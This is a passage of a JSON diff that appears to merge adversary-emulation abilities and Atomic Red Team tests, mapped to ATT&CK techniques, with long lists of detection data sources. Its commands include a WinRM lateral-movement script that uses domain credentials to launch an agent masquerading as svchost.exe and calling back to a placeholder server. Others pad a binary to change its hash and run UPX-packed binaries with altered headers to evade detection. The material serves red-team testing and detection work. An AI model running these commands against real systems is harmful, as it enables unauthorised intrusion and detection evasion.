Agent (WinRM)", + "description": "Start Agent using WinRM (WinRM)", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.006", + "name": "Remote Services: Windows Remote Management" + }, + "platforms": { + "windows": { + "psh": { + "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n", + "cleanup": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{Get-Process cmd | Where-Object Path -eq C:\\Users\\Public\\svchost.exe | Stop-Process}};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n", + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1027.001", + "command_list": [ + "dd if=/dev/zero bs=1 count=1 >> /tmp/evil-binary\n" + ], + "commands": [ + { + "command": "dd if=/dev/zero bs=1 count=1 >> /tmp/evil-binary\n", + "source": "atomics/T1027.001/T1027.001.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Binary Padding" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027.001", + "display_name": "Obfuscated Files or Information: Binary Padding", + "atomic_tests": [ + { + "name": "Pad Binary to Change Hash - Linux/macOS dd", + "auto_generated_guid": "ffe2346c-abd5-4b45-a713-bf5f1ebd573a", + "description": "Uses dd to add a zero to the binary to change the hash.\n\nUpon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_pad": { + "description": "Path of binary to be padded", + "type": "Path", + "default": "/tmp/evil-binary" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The binary must exist on disk at specified location (#{file_to_pad})\n", + "prereq_command": "if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "cp /bin/ls #{file_to_pad}\n" + } + ], + "executor": { + "command": "dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}\n", + "cleanup_command": "rm #{file_to_pad}\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1027.002", + "command_list": [ + "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n", + "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n" + ], + "commands": [ + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + }, + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + }, + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + }, + { + "command": "cp PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed /tmp/packed_bin && /tmp/packed_bin\n", + "source": "atomics/T1027.002/T1027.002.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Software Packing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027.002", + "display_name": "Obfuscated Files or Information: Software Packing", + "atomic_tests": [ + { + "name": "Binary simply packed by UPX (linux)", + "auto_generated_guid": "11c46cd8-e471-450e-acb8-52a1216ae6a4", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\nNo other protection/compression were applied.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/linux/test_upx" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + }, + { + "name": "Binary packed by UPX, with modified headers (linux)", + "auto_generated_guid": "f06197f8-ff46-48c2-a0c6-afc1b50665e1", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\n\nThe UPX magic number (`0x55505821`, \"`UPX!`\") was changed to (`0x4c4f5452`, \"`LOTR`\"). This prevents the binary from being detected\nby some methods, and especially UPX is not able to uncompress it any more.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + }, + { + "name": "Binary simply packed by UPX", + "auto_generated_guid": "b16ef901-00bb-4dda-b4fc-a04db5067e20", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\nNo other protection/compression were applied.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/darwin/test_upx" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + }, + { + "name": "Binary packed by UPX, with modified headers", + "auto_generated_guid": "4d46e16b-5765-4046-9f25-a600d3e65e4d", + "description": "Copies and then runs a simple binary (just outputting \"the cake is a lie\"), that was packed by UPX.\n\nThe UPX magic number (`0x55505821`, \"`UPX!`\") was changed to 